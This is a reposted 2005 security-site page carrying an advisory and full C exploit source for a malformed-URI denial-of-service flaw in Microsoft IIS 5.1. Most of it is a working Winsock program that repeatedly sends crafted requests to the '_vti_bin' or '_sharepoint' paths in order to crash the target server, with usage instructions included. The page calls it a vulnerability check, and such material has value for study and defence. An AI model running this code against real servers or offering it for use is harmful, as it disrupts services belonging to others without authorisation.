首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IIS Malformed URI DoS Exploit
来源:http://l-bytes.tk 作者:Lympex 发布时间:2005-12-27  

Microsoft IIS Malformed URI DoS (Exploit #2)


Summary
Microsoft Internet Information Services (IIS) is "a set of Internet-based services for servers using Microsoft Windows".

Microsoft's IIS 5.1, the version that comes with Windows XP, contains a security vulnerability in its handing of incoming requests that allows remote attackers to cause the service to crash by sending it a malformed request. The following exploit code can be used to determine whether you are vulnerable to the malformed URI request affecting the IIS or not.

Credit:
The information has been provided by Lympex L-Bytes.Net.
The advisory can be found at: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html

Details
Vulnerable Systems:
* Microsoft Internet Information Server version 5.1

Immune Systems:
* Microsoft Internet Information Server version 5.0
* Microsoft Internet Information Server version 6.0

Exploit:
/*
Name: Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit
File: Microsoft.IIS.Malformed.URI.DoS.(_vti_bin,_sharepoint).cpp
Author: Lympex
Contact:
.- Mail: lympex[at]gmail[dot]com
.- Web: http://l-bytes.tk
Date: 20/12/2005
Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"libws2_32.a")

SOCKET Connect(char *Host, short Port)
{
/*make the socket*/
WSADATA wsaData;
SOCKET Winsock;
/*structs*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;

/*init*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociate*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

//check the socket
if(Winsock==INVALID_SOCKET)
{
/*exit*/
WSACleanup();
return 1;
}

/*complete the struct*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(Port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

/*connection*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*exit*/
WSACleanup();
return 1;
}

return Winsock;
}

/*****************/
/* MAIN FUNCTION */
/*****************/
int main(int argc, char *argv[])
{
printf("\n*******************************************************************");
printf("\n* Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit *");
printf("\n*-----------------------------------------------------------------*");
printf("\n* Coded by Lympex: lympex[at]gmail[dot]com && http://l-bytes.tk *");
printf("\n* Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html *");
printf("\n*******************************************************************\n");

if(argc!=6)
{
printf("\n[+] Usage: %s <server.com> <port> <directory> <value> <interval(ms)>",argv[0]);
printf("\n[+] Directories: \x22_vti_bin\x22 / \x22_sharepoint\x22");
printf("\n (Directory must be set to \x22Scripts & Executables\x22");
printf("\n[+] Values: ~0, ~1, ~2, ~3, ~4, ~5, ~6, ~7, ~8, ~9\n");
return -1;
}

BOOL Done=FALSE;
unsigned int i;
SOCKET DoS;
char *Request;

printf("\n[+] Doing DoS Attack...");
Request=(char *)malloc((strlen("GET /")+strlen(argv[3])+strlen(argv[4])+strlen("/.dll/*\\\n\n"))*sizeof(char));
memset(Request,0,sizeof(Request));
//copy the request
strcpy(Request,"GET /");strcat(Request,argv[3]);strcat(Request,"/.dll/*\\");strcat(Request,argv[4]);strcat(Request,"\n\n");

//make a bucle to do the attack
for(i=0;i<5;i++)
{
DoS=Connect(argv[1],(short)atoi(argv[2]));
//check the socket
if(DoS==1)
{
Done=FALSE;
break;
}
send(DoS,Request,strlen(Request),0);
Sleep(100);
WSACleanup();
//check
if(i==4)
{
Done=TRUE;
}
Sleep((DWORD)atoi(argv[5]));
}

//check again
if(Done==TRUE)
{
printf("DONE");
}else{
printf("ERROR - Server down?");
}

LocalFree(Request);
return 0;
}

/* EoF */




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft IIS Malformed URI Do
·PlanetFileServer DoS
·phpBB <= 2.0.17 signature_b
·Electric Sheep Window-Id Local
·Veritas Storage Foundation VCS
·Advanced Guestbook version 2.2
·PHP-Fusion 6.x rating Paramete
·Microsoft Windows / Internet E
·identd 1.2 remote exploit
·Dev web management system <
·GKrellM Vulnerable to Remotely
·mIRC exploit for versions 6.16
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved